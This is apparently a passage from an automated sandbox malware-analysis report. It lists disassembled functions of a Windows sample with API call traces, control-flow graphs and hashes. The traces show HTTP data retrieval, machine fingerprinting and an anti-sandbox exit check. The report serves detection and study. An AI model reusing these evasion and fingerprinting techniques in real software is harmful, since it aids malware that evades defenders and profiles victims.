                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 4042fbf91e302cf0ca02335302780d771f40ff4b066ec1400b6b723aeee34316
                                  • Instruction ID: b87434bc791ca519223134355636f9f134578e377d53bb708c3ee85ddf54107a
                                  • Opcode Fuzzy Hash: 4042fbf91e302cf0ca02335302780d771f40ff4b066ec1400b6b723aeee34316
                                  • Instruction Fuzzy Hash: 50A285709013058FCB2ADF69D948AAAB7F5AF58314F198479E805DB3A1DB31DC86CF90
                                  Function 0031FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320013
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003200BD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003200E1
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003200EC
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320110
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0032011B
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032013F
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0032015A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320189
                                  • lstrlen.KERNEL32(0032CFEC), ref: 00320194
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003201C3
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003201CE
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320206
                                  • lstrlen.KERNEL32(0032CFEC), ref: 00320250
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032059B
                                  • lstrlen.KERNEL32(01016A00), ref: 003205AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003205D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003205E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032060E
                                  • lstrlen.KERNEL32(0102D940), ref: 00320625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00320658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00320681
                                  • lstrlen.KERNEL32(010169C0), ref: 00320698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003206C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003206D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00320706
                                  • lstrcpy.KERNEL32(00000000,01028BB0), ref: 0032074B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032077F
                                  • lstrcpy.KERNEL32(00000000,0102D928), ref: 003207E7
                                  • lstrcpy.KERNEL32(00000000,010288C0), ref: 00320858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 003208CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00320928
                                  • lstrcpy.KERNEL32(00000000,01028990), ref: 003209F8
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 00302528
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 0030254E
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 00302577
                                  • lstrcpy.KERNEL32(00000000,01028830), ref: 00320ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00320B81
                                  • lstrcpy.KERNEL32(00000000,01028830), ref: 00320D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 1d819fbc697bc295c27894bff297d59ed01cf0f105e5857cea9091cdaab6c16e
                                  • Instruction ID: f39376b80d20b963e24b610ed1200f67be878dcfe2a889ee3f283069d9d96864
                                  • Opcode Fuzzy Hash: 1d819fbc697bc295c27894bff297d59ed01cf0f105e5857cea9091cdaab6c16e
                                  • Instruction Fuzzy Hash: ADE26A70A053518FD736DF29D588B6ABBE0BF88304F59896DE48D8B392DB31D845CB42
                                  Function 00306C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 306c40-306c64 call 302930 2237 306c75-306c97 call 304bc0 2234->2237 2238 306c66-306c6b 2234->2238 2242 306c99 2237->2242 2243 306caa-306cba call 302930 2237->2243 2238->2237 2239 306c6d-306c6f lstrcpy 2238->2239 2239->2237 2245 306ca0-306ca8 2242->2245 2247 306cc8-306cf5 InternetOpenA StrCmpCA 2243->2247 2248 306cbc-306cc2 lstrcpy 2243->2248 2245->2243 2245->2245 2249 306cf7 2247->2249 2250 306cfa-306cfc 2247->2250 2248->2247 2249->2250 2251 306d02-306d22 InternetConnectA 2250->2251 2252 306ea8-306ebb call 302930 2250->2252 2253 306ea1-306ea2 InternetCloseHandle 2251->2253 2254 306d28-306d5d HttpOpenRequestA 2251->2254 2261 306ec9-306ee0 call 302a20 * 2 2252->2261 2262 306ebd-306ebf 2252->2262 2253->2252 2256 306d63-306d65 2254->2256 2257 306e94-306e9e InternetCloseHandle 2254->2257 2259 306d67-306d77 InternetSetOptionA 2256->2259 2260 306d7d-306dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 306dd4-306de4 call 323d90 2260->2263 2264 306daf-306dd3 call 3271e0 call 302a20 * 2 2260->2264 2262->2261 2265 306ec1-306ec3 lstrcpy 2262->2265 2263->2264 2274 306de6-306de8 2263->2274 2265->2261 2276 306e8d-306e8e InternetCloseHandle 2274->2276 2277 306dee-306e07 InternetReadFile 2274->2277 2276->2257 2277->2276 2280 306e0d 2277->2280 2282 306e10-306e15 2280->2282 2282->2276 2283 306e17-306e3d call 327310 2282->2283 2286 306e44-306e51 call 302930 2283->2286 2287 306e3f call 302a20 2283->2287 2291 306e61-306e8b call 302a20 InternetReadFile 2286->2291 2292 306e53-306e57 2286->2292 2287->2286 2291->2276 2291->2282 2292->2291 2293 306e59-306e5b lstrcpy 2292->2293 2293->2291
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306C6F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306CC2
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 00306CD5
                                  • StrCmpCA.SHLWAPI(?,0102E3A8), ref: 00306CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00306D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0102DA60,00000000,00000000,-00400100,00000000), ref: 00306D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00306D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00306D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00306DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00306DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00306E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00306E8E
                                  • InternetCloseHandle.WININET(?), ref: 00306E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00306EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00306EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: ec7729464b3350146d7551db680a935a85c3c450238b9b5fff99dc3ff4a44077
                                  • Instruction ID: d9ebfb5a1a65e515f81c93faab40be2dbcfb4c0fd3cc4515738505f67c9081de
                                  • Opcode Fuzzy Hash: ec7729464b3350146d7551db680a935a85c3c450238b9b5fff99dc3ff4a44077
                                  • Instruction Fuzzy Hash: 9C818075A12315ABEB22DFA4DC9AFAE77B8AF44700F154058F905EB2C0DB70AD05CB90
                                  Function 0031F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(010169E0), ref: 0031F315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F47B
                                  • lstrcpy.KERNEL32(00000000,010169E0), ref: 0031F4BB
                                  • lstrcpy.KERNEL32(00000000,01028B00), ref: 0031F4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0031F61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031F718
                                  • lstrlen.KERNEL32(01028BA0), ref: 0031F746
                                  • lstrcpy.KERNEL32(00000000,01028BA0), ref: 0031F771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031FA32
                                  • lstrlen.KERNEL32(01028A90), ref: 0031FA60
                                  • lstrcpy.KERNEL32(00000000,01028A90), ref: 0031FA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031FAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031FAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: df55b2e2f58ddc7d50325a2ac171c64202d66313adfc09e9079e96df096e86bd
                                  • Instruction ID: 9a0436d7b2b52a71e5d42a6639f9002b6a37c67f2a7555244350ee7e2c0a19b7
                                  • Opcode Fuzzy Hash: df55b2e2f58ddc7d50325a2ac171c64202d66313adfc09e9079e96df096e86bd
                                  • Instruction Fuzzy Hash: 4FF15070A01202CFCB2ACF69C858AA5B7F5BF58314B1A81BDD4099B3A1DB35DC86DF50
                                  Function 00318CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 318ca0-318cc4 StrCmpCA 2722 318cc6-318cc7 ExitProcess 2721->2722 2723 318ccd-318ce6 2721->2723 2725 318ee2-318eef call 302a20 2723->2725 2726 318cec-318cf1 2723->2726 2728 318cf6-318cf9 2726->2728 2729 318ec3-318edc 2728->2729 2730 318cff 2728->2730 2729->2725 2770 318cf3 2729->2770 2732 318d30-318d3f lstrlen 2730->2732 2733 318e56-318e64 StrCmpCA 2730->2733 2734 318d5a-318d69 lstrlen 2730->2734 2735 318dbd-318dcb StrCmpCA 2730->2735 2736 318ddd-318deb StrCmpCA 2730->2736 2737 318dfd-318e0b StrCmpCA 2730->2737 2738 318e1d-318e2b StrCmpCA 2730->2738 2739 318e3d-318e4b StrCmpCA 2730->2739 2740 318d84-318d92 StrCmpCA 2730->2740 2741 318da4-318db8 StrCmpCA 2730->2741 2742 318d06-318d15 lstrlen 2730->2742 2743 318e88-318e9a lstrlen 2730->2743 2744 318e6f-318e7d StrCmpCA 2730->2744 2753 318d41-318d46 call 302a20 2732->2753 2754 318d49-318d55 call 302930 2732->2754 2733->2729 2749 318e66-318e6d 2733->2749 2755 318d73-318d7f call 302930 2734->2755 2756 318d6b-318d70 call 302a20 2734->2756 2735->2729 2759 318dd1-318dd8 2735->2759 2736->2729 2760 318df1-318df8 2736->2760 2737->2729 2761 318e11-318e18 2737->2761 2738->2729 2745 318e31-318e38 2738->2745 2739->2729 2746 318e4d-318e54 2739->2746 2740->2729 2758 318d98-318d9f 2740->2758 2741->2729 2747 318d17-318d1c call 302a20 2742->2747 2748 318d1f-318d2b call 302930 2742->2748 2751 318ea4-318eb0 call 302930 2743->2751 2752 318e9c-318ea1 call 302a20 2743->2752 2744->2729 2750 318e7f-318e86 2744->2750 2745->2729 2746->2729 2747->2748 2779 318eb3-318eb5 2748->2779 2749->2729 2750->2729 2751->2779 2752->2751 2753->2754 2754->2779 2755->2779 2756->2755 2758->2729 2759->2729 2760->2729 2761->2729 2770->2728 2779->2729 2780 318eb7-318eb9 2779->2780 2780->2729 2781 318ebb-318ebd lstrcpy 2780->2781 2781->2729
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 493a5cc9072c3210e4ce2ceed7a7f5fd691718fdbf01a1c23579bac7de3e163e
                                  • Instruction ID: ce7a63459b4d198b0002c3a448c6accd37a89f327c523d4d2f78065e44866c18
                                  • Opcode Fuzzy Hash: 493a5cc9072c3210e4ce2ceed7a7f5fd691718fdbf01a1c23579bac7de3e163e
                                  • Instruction Fuzzy Hash: CB517F70A04701EFC7269F75DCC8AAB7BF8BB18700B10481DE442D6650DFB8E9859F65
                                  Function 00322740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2782 322740-322783 GetWindowsDirectoryA 2783 322785 2782->2783 2784 32278c-3227ea GetVolumeInformationA 2782->2784 2783->2784 2785 3227ec-3227f2 2784->2785 2786 3227f4-322807 2785->2786 2787 322809-322820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 322822-322824 2787->2788 2789 322826-322844 wsprintfA 2787->2789 2790 32285b-322872 call 3271e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0032277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003193B6,00000000,00000000,00000000,00000000), ref: 003227AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0032280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322816
                                  • wsprintfA.USER32 ref: 0032283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: 07c4dcac7da0f11e36c3fdece6ad4684fea2c96dcbca8716cb384a0b06985cb4
                                  • Instruction ID: e7ec2aa9449018f09eeb7547197234841bf5291fe98e44a9ab9c2d20f8d0414a
                                  • Opcode Fuzzy Hash: 07c4dcac7da0f11e36c3fdece6ad4684fea2c96dcbca8716cb384a0b06985cb4
                                  • Instruction Fuzzy Hash: 92316DB1908219AFCB15CFB89D859EFFFBCEF58710F10016AE505E7650E2349B408BA1
                                  Function 00304BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 304bc0-304bce 2794 304bd0-304bd5 2793->2794 2794->2794 2795 304bd7-304c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 302a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00304BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00304C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00304C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00304C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00304C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 9bebd8a5bf0c7a4cf5ffa1a19b32ee9520cbd841bdcd5f87d5033c1aceb373c9
                                  • Instruction ID: 441c200ee92b79a5cd15601772d7121d91a1220fb661ffdc1114a12da84c1992
                                  • Opcode Fuzzy Hash: 9bebd8a5bf0c7a4cf5ffa1a19b32ee9520cbd841bdcd5f87d5033c1aceb373c9
                                  • Instruction Fuzzy Hash: B2012D71D01218ABDB15DFA8EC45B9EBBB8EB18320F00816AF954E7390EF7459058FD4
                                  Function 00301030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 301030-301055 GetCurrentProcess VirtualAllocExNuma 2799 301057-301058 ExitProcess 2798->2799 2800 30105e-30107b VirtualAlloc 2798->2800 2801 301082-301088 2800->2801 2802 30107d-301080 2800->2802 2803 3010b1-3010b6 2801->2803 2804 30108a-3010ab VirtualFree 2801->2804 2802->2801 2804->2803
                                  APIs
